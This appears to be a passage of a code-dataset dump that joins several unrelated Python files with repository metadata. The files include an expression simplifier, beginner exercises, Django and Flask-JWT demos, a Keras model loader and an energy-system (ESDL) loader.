elif op_name == 'umod':
assert int2.arg.arg
tmp1 = mod_size2uint[int1.arg.size](int1.arg)
tmp2 = mod_size2uint[int2.arg.size](int2.arg)
out = mod_size2uint[int1.arg.size](tmp1 % tmp2)
elif op_name == 'udiv':
assert int2.arg.arg
tmp1 = mod_size2uint[int1.arg.size](int1.arg)
tmp2 = mod_size2uint[int2.arg.size](int2.arg)
out = mod_size2uint[int1.arg.size](tmp1 / tmp2)
args.append(ExprInt(out, int1.size))
# cnttrailzeros(int) => int
if op_name == "cnttrailzeros" and args[0].is_int():
i = 0
while args[0].arg & (1 << i) == 0 and i < args[0].size:
i += 1
return ExprInt(i, args[0].size)
# cntleadzeros(int) => int
if op_name == "cntleadzeros" and args[0].is_int():
if args[0].arg == 0:
return ExprInt(args[0].size, args[0].size)
i = args[0].size - 1
while args[0].arg & (1 << i) == 0:
i -= 1
return ExprInt(expr.size - (i + 1), args[0].size)
# -(-(A)) => A
if (op_name == '-' and len(args) == 1 and args[0].is_op('-') and
len(args[0].args) == 1):
return args[0].args[0]
# -(int) => -int
if op_name == '-' and len(args) == 1 and args[0].is_int():
return ExprInt(-int(args[0]), expr.size)
# A op 0 =>A
if op_name in ['+', '|', "^", "<<", ">>", "<<<", ">>>"] and len(args) > 1:
if args[-1].is_int(0):
args.pop()
# A - 0 =>A
if op_name == '-' and len(args) > 1 and args[-1].is_int(0):
assert len(args) == 2 # Op '-' with more than 2 args: SantityCheckError
return args[0]
# A * 1 =>A
if op_name == "*" and len(args) > 1 and args[-1].is_int(1):
args.pop()
# for cannon form
# A * -1 => - A
if op_name == "*" and len(args) > 1 and args[-1] == args[-1].mask:
args.pop()
args[-1] = - args[-1]
# op A => A
if op_name in ['+', '*', '^', '&', '|', '>>', '<<',
'a>>', '<<<', '>>>', 'idiv', 'imod', 'umod', 'udiv'] and len(args) == 1:
return args[0]
# A-B => A + (-B)
if op_name == '-' and len(args) > 1:
if len(args) > 2:
raise ValueError(
'sanity check fail on expr -: should have one or 2 args ' +
'%r %s' % (expr, expr))
return ExprOp('+', args[0], -args[1])
# A op 0 => 0
if op_name in ['&', "*"] and args[-1].is_int(0):
return ExprInt(0, expr.size)
# - (A + B +...) => -A + -B + -C
if op_name == '-' and len(args) == 1 and args[0].is_op('+'):
args = [-a for a in args[0].args]
return ExprOp('+', *args)
# -(a?int1:int2) => (a?-int1:-int2)
if (op_name == '-' and len(args) == 1 and
args[0].is_cond() and
args[0].src1.is_int() and args[0].src2.is_int()):
int1 = args[0].src1
int2 = args[0].src2
int1 = ExprInt(-int1.arg, int1.size)
int2 = ExprInt(-int2.arg, int2.size)
return ExprCond(args[0].cond, int1, int2)
i = 0
while i < len(args) - 1:
j = i + 1
while j < len(args):
# A ^ A => 0
if op_name == '^' and args[i] == args[j]:
args[i] = ExprInt(0, args[i].size)
del args[j]
continue
# A + (- A) => 0
if op_name == '+' and args[j].is_op("-"):
if len(args[j].args) == 1 and args[i] == args[j].args[0]:
args[i] = ExprInt(0, args[i].size)
del args[j]
continue
# (- A) + A => 0
if op_name == '+' and args[i].is_op("-"):
if len(args[i].args) == 1 and args[j] == args[i].args[0]:
args[i] = ExprInt(0, args[i].size)
del args[j]
continue
# A | A => A
if op_name == '|' and args[i] == args[j]:
del args[j]
continue
# A & A => A
if op_name == '&' and args[i] == args[j]:
del args[j]
continue
j += 1
i += 1
if op_name in ['|', '&', '%', '/', '**'] and len(args) == 1:
return args[0]
# A <<< A.size => A
if (op_name in ['<<<', '>>>'] and
args[1].is_int() and
args[1].arg == args[0].size):
return args[0]
# (A <<< X) <<< Y => A <<< (X+Y) (or <<< >>>) if X + Y does not overflow
if (op_name in ['<<<', '>>>'] and
args[0].is_op() and
args[0].op in ['<<<', '>>>']):
A = args[0].args[0]
X = args[0].args[1]
Y = args[1]
if op_name != args[0].op and e_s(X - Y) == ExprInt(0, X.size):
return args[0].args[0]
elif X.is_int() and Y.is_int():
new_X = int(X) % expr.size
new_Y = int(Y) % expr.size
if op_name == args[0].op:
rot = (new_X + new_Y) % expr.size
op = op_name
else:
rot = new_Y - new_X
op = op_name
if rot < 0:
rot = - rot
op = {">>>": "<<<", "<<<": ">>>"}[op_name]
args = [A, ExprInt(rot, expr.size)]
op_name = op
else:
# Do not consider this case, too tricky (overflow on addition /
# substraction)
pass
# A >> X >> Y => A >> (X+Y) if X + Y does not overflow
# To be sure, only consider the simplification when X.msb and Y.msb are 0
if (op_name in ['<<', '>>'] and
args[0].is_op(op_name)):
X = args[0].args[1]
Y = args[1]
if (e_s(X.msb()) == ExprInt(0, 1) and
e_s(Y.msb()) == ExprInt(0, 1)):
args = [args[0].args[0], X + Y]
# ((A & A.mask)
if op_name == "&" and args[-1] == expr.mask:
return ExprOp('&', *args[:-1])
# ((A | A.mask)
if op_name == "|" and args[-1] == expr.mask:
return args[-1]
# ! (!X + int) => X - int
# TODO
# ((A & mask) >> shift) whith mask < 2**shift => 0
if op_name == ">>" and args[1].is_int() and args[0].is_op("&"):
if (args[0].args[1].is_int() and
2 ** args[1].arg > args[0].args[1].arg):
return ExprInt(0, args[0].size)
# parity(int) => int
if op_name == 'parity' and args[0].is_int():
return ExprInt(parity(int(args[0])), 1)
# (-a) * b * (-c) * (-d) => (-a) * b * c * d
if op_name == "*" and len(args) > 1:
new_args = []
counter = 0
for arg in args:
if arg.is_op('-') and len(arg.args) == 1:
new_args.append(arg.args[0])
counter += 1
else:
new_args.append(arg)
if counter % 2:
return -ExprOp(op_name, *new_args)
args = new_args
# A << int with A ExprCompose => move index
if (op_name == "<<" and args[0].is_compose() and
args[1].is_int() and int(args[1]) != 0):
final_size = args[0].size
shift = int(args[1])
new_args = []
# shift indexes
for index, arg in args[0].iter_args():
new_args.append((arg, index+shift, index+shift+arg.size))
# filter out expression
filter_args = []
min_index = final_size
for tmp, start, stop in new_args:
if start >= final_size:
continue
if stop > final_size:
tmp = tmp[:tmp.size - (stop - final_size)]
stop = final_size
filter_args.append(tmp)
min_index = min(start, min_index)
# create entry 0
assert min_index != 0
tmp = ExprInt(0, min_index)
args = [tmp] + filter_args
return ExprCompose(*args)
# A >> int with A ExprCompose => move index
if op_name == ">>" and args[0].is_compose() and args[1].is_int():
final_size = args[0].size
shift = int(args[1])
new_args = []
# shift indexes
for index, arg in args[0].iter_args():
new_args.append((arg, index-shift, index+arg.size-shift))
# filter out expression
filter_args = []
max_index = 0
for tmp, start, stop in new_args:
if stop <= 0:
continue
if start < 0:
tmp = tmp[-start:]
start = 0
filter_args.append(tmp)
max_index = max(stop, max_index)
# create entry 0
tmp = ExprInt(0, final_size - max_index)
args = filter_args + [tmp]
return ExprCompose(*args)
# Compose(a) OP Compose(b) with a/b same bounds => Compose(a OP b)
if op_name in ['|', '&', '^'] and all([arg.is_compose() for arg in args]):
bounds = set()
for arg in args:
bound = tuple([tmp.size for tmp in arg.args])
bounds.add(bound)
if len(bounds) == 1:
bound = list(bounds)[0]
new_args = [[tmp] for tmp in args[0].args]
for sub_arg in args[1:]:
for i, tmp in enumerate(sub_arg.args):
new_args[i].append(tmp)
args = []
for i, arg in enumerate(new_args):
args.append(ExprOp(op_name, *arg))
return ExprCompose(*args)
return ExprOp(op_name, *args)
def simp_cond_op_int(e_s, expr):
"Extract conditions from operations"
# x?a:b + x?c:d + e => x?(a+c+e:b+d+e)
if not expr.op in ["+", "|", "^", "&", "*", '<<', '>>', 'a>>']:
return expr
if len(expr.args) < 2:
return expr
conds = set()
for arg in expr.args:
if arg.is_cond():
conds.add(arg)
if len(conds) != 1:
return expr
cond = list(conds).pop()
args1, args2 = [], []
for arg in expr.args:
if arg.is_cond():
args1.append(arg.src1)
args2.append(arg.src2)
else:
args1.append(arg)
args2.append(arg)
return ExprCond(cond.cond,
ExprOp(expr.op, *args1),
ExprOp(expr.op, *args2))
def simp_cond_factor(e_s, expr):
"Merge similar conditions"
if not expr.op in ["+", "|", "^", "&", "*", '<<', '>>', 'a>>']:
return expr
if len(expr.args) < 2:
return expr
if expr.op in ['>>', '<<', 'a>>']:
assert len(expr.args) == 2
# Note: the following code is correct for non-commutative operation only if
# there is 2 arguments. Otherwise, the order is not conserved
# Regroup sub-expression by similar conditions
conds = {}
not_conds = []
multi_cond = False
for arg in expr.args:
if not arg.is_cond():
not_conds.append(arg)
continue
cond = arg.cond
if not cond in conds:
conds[cond] = []
else:
multi_cond = True
conds[cond].append(arg)
if not multi_cond:
return expr
# Rebuild the new expression
c_out = not_conds
for cond, vals in conds.items():
new_src1 = [x.src1 for x in vals]
new_src2 = [x.src2 for x in vals]
src1 = e_s.expr_simp_wrapper(ExprOp(expr.op, *new_src1))
src2 = e_s.expr_simp_wrapper(ExprOp(expr.op, *new_src2))
c_out.append(ExprCond(cond, src1, src2))
if len(c_out) == 1:
new_e = c_out[0]
else:
new_e = ExprOp(expr.op, *c_out)
return new_e
def simp_slice(e_s, expr):
"Slice optimization"
# slice(A, 0, a.size) => A
if expr.start == 0 and expr.stop == expr.arg.size:
return expr.arg
# Slice(int) => int
if expr.arg.is_int():
total_bit = expr.stop - expr.start
mask = (1 << (expr.stop - expr.start)) - 1
return ExprInt(int((expr.arg.arg >> expr.start) & mask), total_bit)
# Slice(Slice(A, x), y) => Slice(A, z)
if expr.arg.is_slice():
if expr.stop - expr.start > expr.arg.stop - expr.arg.start:
raise ValueError('slice in slice: getting more val', str(expr))
return ExprSlice(expr.arg.arg, expr.start + expr.arg.start,
expr.start + expr.arg.start + (expr.stop - expr.start))
if expr.arg.is_compose():
# Slice(Compose(A), x) => Slice(A, y)
for index, arg in expr.arg.iter_args():
if index <= expr.start and index+arg.size >= expr.stop:
return arg[expr.start - index:expr.stop - index]
# Slice(Compose(A, B, C), x) => Compose(A, B, C) with truncated A/B/C
out = []
for index, arg in expr.arg.iter_args():
# arg is before slice start
if expr.start >= index + arg.size:
continue
# arg is after slice stop
elif expr.stop <= index:
continue
# arg is fully included in slice
elif expr.start <= index and index + arg.size <= expr.stop:
out.append(arg)
continue
# arg is truncated at start
if expr.start > index:
slice_start = expr.start - index
else:
# arg is not truncated at start
slice_start = 0
# a is truncated at stop
if expr.stop < index + arg.size:
slice_stop = arg.size + expr.stop - (index + arg.size) - slice_start
else:
slice_stop = arg.size
out.append(arg[slice_start:slice_stop])
return ExprCompose(*out)
# ExprMem(x, size)[:A] => ExprMem(x, a)
# XXXX todo hum, is it safe?
if (expr.arg.is_mem() and
expr.start == 0 and
expr.arg.size > expr.stop and expr.stop % 8 == 0):
return ExprMem(expr.arg.arg, size=expr.stop)
# distributivity of slice and &
# (a & int)[x:y] => 0 if int[x:y] == 0
if expr.arg.is_op("&") and expr.arg.args[-1].is_int():
tmp = e_s.expr_simp_wrapper(expr.arg.args[-1][expr.start:expr.stop])
if tmp.is_int(0):
return tmp
# distributivity of slice and exprcond
# (a?int1:int2)[x:y] => (a?int1[x:y]:int2[x:y])
if expr.arg.is_cond() and expr.arg.src1.is_int() and expr.arg.src2.is_int():
src1 = expr.arg.src1[expr.start:expr.stop]
src2 = expr.arg.src2[expr.start:expr.stop]
return ExprCond(expr.arg.cond, src1, src2)
# (a * int)[0:y] => (a[0:y] * int[0:y])
if expr.start == 0 and expr.arg.is_op("*") and expr.arg.args[-1].is_int():
args = [e_s.expr_simp_wrapper(a[expr.start:expr.stop]) for a in expr.arg.args]
return ExprOp(expr.arg.op, *args)
# (a >> int)[x:y] => a[x+int:y+int] with int+y <= a.size
# (a << int)[x:y] => a[x-int:y-int] with x-int >= 0
if (expr.arg.is_op() and expr.arg.op in [">>", "<<"] and
expr.arg.args[1].is_int()):
arg, shift = expr.arg.args
shift = int(shift)
if expr.arg.op == ">>":
if shift + expr.stop <= arg.size:
return arg[expr.start + shift:expr.stop + shift]
elif expr.arg.op == "<<":
if expr.start - shift >= 0:
return arg[expr.start - shift:expr.stop - shift]
else:
raise ValueError('Bad case')
return expr
def simp_compose(e_s, expr):
"Commons simplification on ExprCompose"
args = merge_sliceto_slice(expr)
out = []
# compose of compose
for arg in args:
if arg.is_compose():
out += arg.args
else:
out.append(arg)
args = out
# Compose(a) with a.size = compose.size => a
if len(args) == 1 and args[0].size == expr.size:
return args[0]
# {(X[z:], 0, X.size-z), (0, X.size-z, X.size)} => (X >> z)
if len(args) == 2 and args[1].is_int(0):
if (args[0].is_slice() and
args[0].stop == args[0].arg.size and
args[0].size + args[1].size == args[0].arg.size):
new_expr = args[0].arg >> ExprInt(args[0].start, args[0].arg.size)
return new_expr
# {@X[base + i] 0 X, @Y[base + i + X] X (X + Y)} => @(X+Y)[base + i]
for i, arg in enumerate(args[:-1]):
nxt = args[i + 1]
if arg.is_mem() and nxt.is_mem():
gap = e_s(nxt.arg - arg.arg)
if gap.is_int() and arg.size % 8 == 0 and int(gap) == arg.size / 8:
args = args[:i] + [ExprMem(arg.arg,
arg.size + nxt.size)] + args[i + 2:]
return ExprCompose(*args)
# {a, x?b:d, x?c:e, f} => x?{a, b, c, f}:{a, d, e, f}
conds = set(arg.cond for arg in expr.args if arg.is_cond())
if len(conds) == 1:
cond = list(conds)[0]
args1, args2 = [], []
for arg in expr.args:
if arg.is_cond():
args1.append(arg.src1)
args2.append(arg.src2)
else:
args1.append(arg)
args2.append(arg)
arg1 = e_s(ExprCompose(*args1))
arg2 = e_s(ExprCompose(*args2))
return ExprCond(cond, arg1, arg2)
return ExprCompose(*args)
def simp_cond(e_s, expr):
"Common simplifications on ExprCond"
# eval exprcond src1/src2 with satifiable/unsatisfiable condition
# propagation
if (not expr.cond.is_int()) and expr.cond.size == 1:
src1 = expr.src1.replace_expr({expr.cond: ExprInt(1, 1)})
src2 = expr.src2.replace_expr({expr.cond: ExprInt(0, 1)})
if src1 != expr.src1 or src2 != expr.src2:
return ExprCond(expr.cond, src1, src2)
# -A ? B:C => A ? B:C
if expr.cond.is_op('-') and len(expr.cond.args) == 1:
expr = ExprCond(expr.cond.args[0], expr.src1, expr.src2)
# a?x:x
elif expr.src1 == expr.src2:
expr = expr.src1
# int ? A:B => A or B
elif expr.cond.is_int():
if expr.cond.arg == 0:
expr = expr.src2
else:
expr = expr.src1
# a?(a?b:c):x => a?b:x
elif expr.src1.is_cond() and expr.cond == expr.src1.cond:
expr = ExprCond(expr.cond, expr.src1.src1, expr.src2)
# a?x:(a?b:c) => a?x:c
elif expr.src2.is_cond() and expr.cond == expr.src2.cond:
expr = ExprCond(expr.cond, expr.src1, expr.src2.src2)
# a|int ? b:c => b with int != 0
elif (expr.cond.is_op('|') and
expr.cond.args[1].is_int() and
expr.cond.args[1].arg != 0):
return expr.src1
# (C?int1:int2)?(A:B) =>
elif (expr.cond.is_cond() and
expr.cond.src1.is_int() and
expr.cond.src2.is_int()):
int1 = expr.cond.src1.arg.arg
int2 = expr.cond.src2.arg.arg
if int1 and int2:
expr = expr.src1
elif int1 == 0 and int2 == 0:
expr = expr.src2
elif int1 == 0 and int2:
expr = ExprCond(expr.cond.cond, expr.src2, expr.src1)
elif int1 and int2 == 0:
expr = ExprCond(expr.cond.cond, expr.src1, expr.src2)
return expr
def simp_mem(e_s, expr):
"Common simplifications on ExprMem"
# @32[x?a:b] => x?@32[a]:@32[b]
if expr.arg.is_cond():
cond = expr.arg
ret = ExprCond(cond.cond,
ExprMem(cond.src1, expr.size),
ExprMem(cond.src2, expr.size))
return ret
return expr
|
[
"yangx16@mails.tsinghua.edu.cn"
] |
yangx16@mails.tsinghua.edu.cn
|
fabf8eca0d73238ad7b2b58e3b2ce7e1653c512b
|
1b8b4cdd251877868c1d3530fab7e84a692c91be
|
/learn-python-hard-way/ex30.py
|
9db64f4ab63ef2e0be95c6291680194b23a7ebc3
|
[] |
no_license
|
vaibhavmule/learning-python
|
d1756f4e160bd24e4a2d1d05e383866f2248d523
|
46ec3a437606526760d56ccfefaad74f7184c9ab
|
refs/heads/master
| 2021-09-28T19:42:47.545788
| 2020-07-24T14:07:06
| 2020-07-24T14:07:06
| 20,795,878
| 0
| 2
| null | 2021-09-22T19:33:09
| 2014-06-13T07:29:00
|
HTML
|
UTF-8
|
Python
| false
| false
| 865
|
py
|
# this is exercise 30: Else and If
people = 30 # a variables storing how many people
cars = 40 # a variable storing how many cars
buses = 15 # a variable storing how many buses
# cheking if cars are greater than people
if cars > people:
print "We should take the cars"
# cheking else if cars are less than people
elif cars < people:
print "We should not take the cars"
# cheking what else we can do
else:
print "We can't decide."
# check if buses are greater than cars
if buses > cars:
print "That's too many buses."
# check else if buses are less than cars
elif buses < cars:
print "Maybe we could take the buses"
# check what else we can do
else:
print "We still can't decide."
# check if people are greater than buses
if people > buses:
print "Alright, lets just take the buses."
# what else we can do
else:
print "Fine, let's stay home then."
|
[
"vaibhavmule135@gmail.com"
] |
vaibhavmule135@gmail.com
|
66aacd00e7bdce2111722d081c2878c8166da8bd
|
a16feb303b7599afac19a89945fc2a9603ae2477
|
/Simple_Python/standard/warnings/warning_7.py
|
4d1c278ced1e85f70f1fecb7598ecdf883061180
|
[] |
no_license
|
yafeile/Simple_Study
|
d75874745ce388b3d0f9acfa9ebc5606a5745d78
|
c3c554f14b378b487c632e11f22e5e3118be940c
|
refs/heads/master
| 2021-01-10T22:08:34.636123
| 2015-06-10T11:58:59
| 2015-06-10T11:58:59
| 24,746,770
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 205
|
py
|
#! /usr/bin/env/python
# -*- coding:utf-8 -*-
import warnings
def function_with_warning():
warnings.warn('This is a warning!')
function_with_warning()
function_with_warning()
function_with_warning()
|
[
"zhuzhulang@126.com"
] |
zhuzhulang@126.com
|
142605103bd51c65d180b03c9c2e997fb0ecb502
|
3199331cede4a22b782f945c6a71150a10c61afc
|
/20210516PythonAdvanced/02-metaclass/hook02/library.py
|
9f65187d305857184f27f2201567db7d17e230f6
|
[] |
no_license
|
AuroraBoreas/language-review
|
6957a3cde2ef1b6b996716addaee077e70351de8
|
2cb0c491db7d179c283dba205b4d124a8b9a52a3
|
refs/heads/main
| 2023-08-19T23:14:24.981111
| 2021-10-11T12:01:47
| 2021-10-11T12:01:47
| 343,345,371
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
"#Python is a protocol orientated lang; every top-level function or sytax has a corresponding dunder method implemented;"
class BaseMeta(type):
def __new__(cls, name, bases, body):
print('__new__ : ', cls, name, bases, body)
if bases:
if Base in bases:
assert 'bar' in body, f'bar() not found in {name}'
return super().__new__(cls, name, bases, body)
class Base(metaclass=BaseMeta):
def foo(self):
return self.bar()
|
[
"noreply@github.com"
] |
AuroraBoreas.noreply@github.com
|
6955d4a7a1fe1a97208eb2b8ebdbcfb9fcee631c
|
dc0981eaa83f9873f9967fe102b6f49e04e7e4a9
|
/website/api/views.py
|
77a8bec609a646c8c38d34fa6557a8c7db6e7431
|
[] |
no_license
|
basheer-97/DjangoBlog
|
f49018b25a291847e7b9a18347b79c3d04ebcd84
|
61279c8bc7d9db6fc9896690c353e127d1e6f929
|
refs/heads/master
| 2021-03-14T06:05:58.278753
| 2020-10-07T06:34:52
| 2020-10-07T06:34:52
| 246,744,000
| 3
| 3
| null | 2020-10-07T06:34:54
| 2020-03-12T04:32:56
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 434
|
py
|
from django.shortcuts import render
from rest_framework import generics, permissions
from website1.models import Post
from . serializers import PostSerializer
# Create your views here.
class PostAPIView(generics.RetrieveUpdateDestroyAPIView):
queryset=Post.objects.all()
serializer_class=PostSerializer
class PostAPIDetailView(generics.ListCreateAPIView):
queryset=Post.objects.all()
serializer_class=PostSerializer
|
[
"basheerbilal66@gmail.com"
] |
basheerbilal66@gmail.com
|
9afc6dd796a3185ae335688d95be5c99502abd65
|
fa1b7d67de2499d8a90b04f8f84d6189568d6fc3
|
/models/load_model.py
|
bc6bf6f3ab48480920d973b9e6e2172c5c13d0cb
|
[
"Apache-2.0"
] |
permissive
|
SGT103/med_segmentation
|
50502b9e291691b1a3bc8aa5154099cf423396a6
|
ca32024224a3a3f8496bc88aeb756b1475e87b48
|
refs/heads/master
| 2023-08-27T17:09:51.698223
| 2021-07-14T08:55:08
| 2021-07-14T08:55:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,515
|
py
|
from models import Premodel_Custom_Class
from models.Premodel_Custom_Class import *
from models.ModelSet import *
from models.Premodel_Set import *
from tensorflow.keras.models import load_model
import tensorflow as tf
def load_model_file(config, dataset, compile=False):
if config['load_weights_only'] == True:
if 'premodel' in config['model']:
# Load the model weights, the model is defined in Premodel_Set.py
call_model = getattr(Premodel_Set, config['model'])
model, _ = call_model(self=Premodel_Set, config=config)
print('Now dealing dataset ', dataset, 'from the model ', config['model'], '...')
print(config['saved_premodels_path'])
model.load_weights(config['saved_premodels_path'])
else:
# Load the model weights, the model is defined in ModelSet.py
call_model = getattr(ModelSet, config['model'])
model, _ = call_model(self=ModelSet, config=config)
print('Now dealing dataset ', dataset, 'from the model ', config['model'], '...')
print('The model path: ', config['saved_models_dir'] +'/'+config['exp_name']+ '/' + config['model'] + '/' + dataset + '.h5')
model.load_weights(config['saved_models_dir'] +'/'+ config['exp_name']+'/' + config['model'] + '/' + dataset + '.h5')
else:
# Load the model without knowing its structure.
# custom_object is not implement
if config['model'] is None:
config['model'] = 'custom_model'
if config['custom_layer'] is None:
model = load_model(config['saved_premodels_path'], compile=False)
else:
if isinstance(config['custom_layer'], str): config['custom_layer'] = [config['custom_layer']]
custom_object = dict()
for obj in config['custom_layer']:
layer = getattr(Premodel_Custom_Class, obj)
custom_object[obj] = layer
model = load_model(config['saved_premodels_path'], custom_objects=custom_object, compile=False)
if compile:
in_ = model.get_layer(name='input_X')
out = model.get_layer(name='output_Y')
if config['feed_pos']:
in_pos = model.get_layer(name='input_position')
model, _ = create_and_compile_model([in_, in_pos], out, config, premodel=model)
else:
model, _ = create_and_compile_model(in_, out, config, premodel=model)
return model
|
[
"thomas.kuestner@uni-tuebingen.de"
] |
thomas.kuestner@uni-tuebingen.de
|
168b6d18f1582998e07f62bd36f0ff9b02258b4d
|
cb11ce1fe40a24e87ceb0066e10f5cdf908c5c8f
|
/neighbourhood/migrations/0004_auto_20190708_1010.py
|
55f9cea6a605a4e8064225f721f570d8f8f97b4d
|
[
"MIT"
] |
permissive
|
maurinesinami/neighbourhood
|
003d0774dae55b292109da9f6033743598443011
|
b6b2562ff0db9dce522f8f7c7056a07b52181b7d
|
refs/heads/master
| 2021-09-09T06:22:25.412397
| 2019-07-10T04:31:29
| 2019-07-10T04:31:29
| 195,639,243
| 0
| 0
| null | 2021-09-08T01:07:56
| 2019-07-07T10:42:07
|
Python
|
UTF-8
|
Python
| false
| false
| 1,217
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11 on 2019-07-08 07:10
from __future__ import unicode_literals
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('neighbourhood', '0003_business'),
]
operations = [
migrations.AlterField(
model_name='business',
name='bn_community',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.CASCADE, to='neighbourhood.Community'),
preserve_default=False,
),
migrations.AlterField(
model_name='business',
name='bn_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='post',
name='img',
field=models.ImageField(blank=True, default=0, upload_to='posts/'),
preserve_default=False,
),
migrations.AlterField(
model_name='post',
name='text',
field=models.CharField(max_length=500),
),
]
|
[
"maurinenami"
] |
maurinenami
|
3685cfbf63e35434703fc37cb0fccc72c970fbc5
|
8377cfd463e2d2361f1e9f347b0513ed8558eff4
|
/PythonPlay/flask-jwt-master/flask_JWT_study.py
|
0179da4c91499012e0f080e4a027f99cdaa366cc
|
[
"MIT"
] |
permissive
|
ZHLOVE/PersonalDemoGroup
|
a6fbf237c26315b8b77fca857284a06c1979c9cf
|
9db291f4a44da0656d0b11c082b8e79632a76eb4
|
refs/heads/master
| 2021-01-23T15:16:34.505524
| 2017-09-06T06:54:41
| 2017-09-06T06:54:41
| 102,700,421
| 1
| 0
| null | 2017-09-07T06:33:22
| 2017-09-07T06:33:21
| null |
UTF-8
|
Python
| false
| false
| 1,108
|
py
|
from flask import Flask
from flask_jwt import JWT, jwt_required, current_identity
from werkzeug.security import safe_str_cmp
class User(object):
def __init__(self, id, username, password):
self.id = id
self.username = username
self.password = password
def __str__(self):
return "User(id='%s')" % self.id
users = [
User(1,'mql','mql'),
User(2,'gcy','gcy'),
]
username_table = {u.username: u for u in users}
userid_table = {u.id: u for u in users}
def authenticate(username, password):
user = username_table.get(username, None)
if user and safe_str_cmp(user.password.encode('utf-8'),password.encode('utf-8')):
return user
def identity(payload):
user_id = payload['identity']
return userid_table.get(user_id, None)
app = Flask(__name__)
app.debug = True
app.config['SECRET_KEY'] = 'super-secret'
jwt = JWT(app, authenticate, identity)
@app.route('/protected')
@jwt_required()
def protected():
return '%s' % current_identity
if __name__ == '__main__':
print 'start'
app.run()
#end
|
[
"301063915@qq.com"
] |
301063915@qq.com
|
b27fc0673fd407edc7a1d6c38fa52398cb7fd3b0
|
4bf380ed05bea3676dd54573bfd61d71dafcef7a
|
/violinHelper/Sound/FreqTable.py
|
23d5f4e16b12d5180ae0b0d118d3865500d9f271
|
[] |
no_license
|
thusimon/Lutos
|
6d58bc80230607933cf29f9543bff218c1cf0e21
|
b0b372f5de8325231fc5e5e11e8f0f57392df887
|
refs/heads/master
| 2021-01-02T22:49:10.852578
| 2018-08-02T05:35:44
| 2018-08-02T05:35:44
| 99,402,338
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,113
|
py
|
class FreqTable:
def __init__(self):
self.freqTable = dict()
self.freqTable["g3"] = 196
self.freqTable["g3#"] = 208
self.freqTable["a3"] = 220
self.freqTable["a3#"] = 233
self.freqTable["b3"] = 245
self.freqTable["c4"] = 262
self.freqTable["c4#"] = 277
self.freqTable["d4"] = 294
self.freqTable["d4#"] = 311
self.freqTable["e4"] = 330
self.freqTable["f4"] = 349 # half key 19
self.freqTable["f4#"] = 370
self.freqTable["g4"] = 392
self.freqTable["g4#"] = 415
self.freqTable["a4"] = 440
self.freqTable["a4#"] = 466
self.freqTable["b4"] = 494
self.freqTable["c5"] = 523
self.freqTable["c5#"] = 554
self.freqTable["d5"] = 587
self.freqTable["d5#"] = 622
self.freqTable["e5"] = 659
self.freqTable["f5"] = 698
self.freqTable["f5#"] = 740
self.freqTable["g5"] = 784
self.freqTable["g5#"] = 830
self.freqTable["a5"] = 880
self.freqTable["a5#"] = 932
self.freqTable["b5"] = 988
|
[
"thusimon@gmail.com"
] |
thusimon@gmail.com
|
5f7d0a63465078de1873b526e0c6c52e900c6779
|
25954758ded6a560b266bfda69632f74a39e9d9e
|
/EnergySystemHandler.py
|
a7801dea6dc17393f9ba30f6b9d78080317523d1
|
[] |
no_license
|
redekok/startanalyse-esdl
|
3a2ce784a731782fba0cecc63348457c1b8d8489
|
070316b580881d4f7fe329dea3e6d35abaeea1fb
|
refs/heads/master
| 2020-08-01T15:09:24.031908
| 2019-09-26T07:42:38
| 2019-09-26T07:42:38
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,853
|
py
|
from time import sleep
from pyecore.resources import ResourceSet, URI
from pyecore.utils import DynamicEPackage, alias
from pyecore.resources.resource import HttpURI
from xmlresource import XMLResource
from pyecore.notification import EObserver
import uuid
from io import BytesIO
class EnergySystemHandler:
"""Class to handle (load, read, and update) an ESDL Energy System"""
def __init__(self, name):
self.name = name
self.es, self.resource, self.esdl, self.rset = self.load_energy_system(name)
# print('\nEnergy system \"{}\" is loaded!'.format(name))
# Creates a dict of all the attributes of an ESDL object
@staticmethod
def attr_to_dict(esdl_object):
d = dict()
d['esdlType'] = esdl_object.eClass.name
for attr in dir(esdl_object):
attr_value = esdl_object.eGet(attr)
if attr_value is not None:
d[attr] = attr_value
return d
# Creates a uuid: useful for generating unique IDs
@staticmethod
def generate_uuid():
return str(uuid.uuid4())
def load_energy_system(self, name):
# create a resourceSet that hold the contents of the esdl.ecore model and the instances we use/create
rset = ResourceSet()
# Assign files with the .esdl extension to the XMLResource instead of default XMI
rset.resource_factory['esdl'] = lambda uri: XMLResource(uri)
# Read the lastest esdl.ecore from github
esdl_model_resource = rset.get_resource(HttpURI('https://raw.githubusercontent.com/EnergyTransition/ESDL/master/esdl/model/esdl.ecore'))
esdl_model = esdl_model_resource.contents[0]
# print('Namespace: {}'.format(esdl_model.nsURI))
rset.metamodel_registry[esdl_model.nsURI] = esdl_model
# Create a dynamic model from the loaded esdl.ecore model, which we can use to build Energy Systems
esdl = DynamicEPackage(esdl_model)
# fix python buildin 'from' that is also used in ProfileElement as attribute
# use 'start' instead of 'from' when using a ProfileElement
alias('start', esdl.ProfileElement.findEStructuralFeature('from'))
# have a nice __repr__ for some ESDL classes when printing ESDL objects (includes all Assets and EnergyAssets)
esdl.Item.python_class.__repr__ = lambda x: '{}: ({})'.format(x.name, EnergySystemHandler.attr_to_dict(x))
esdl.Carrier.python_class.__repr__ = lambda x: '{}: ({})'.format(x.name, EnergySystemHandler.attr_to_dict(x))
esdl.Geometry.python_class.__repr__ = lambda x: '{}: ({})'.format(x.name, EnergySystemHandler.attr_to_dict(x))
esdl.QuantityAndUnitType.python_class.__repr__ = lambda x: '{}: ({})'.format(x.id, EnergySystemHandler.attr_to_dict(x))
esdl.QuantityAndUnitReference.python_class.__repr__ = lambda x: '{}: ({})'.format('QuantityAndUnitReference', EnergySystemHandler.attr_to_dict(x))
esdl.KPI.python_class.__repr__ = lambda x: '{}: ({})'.format(x.name, EnergySystemHandler.attr_to_dict(x))
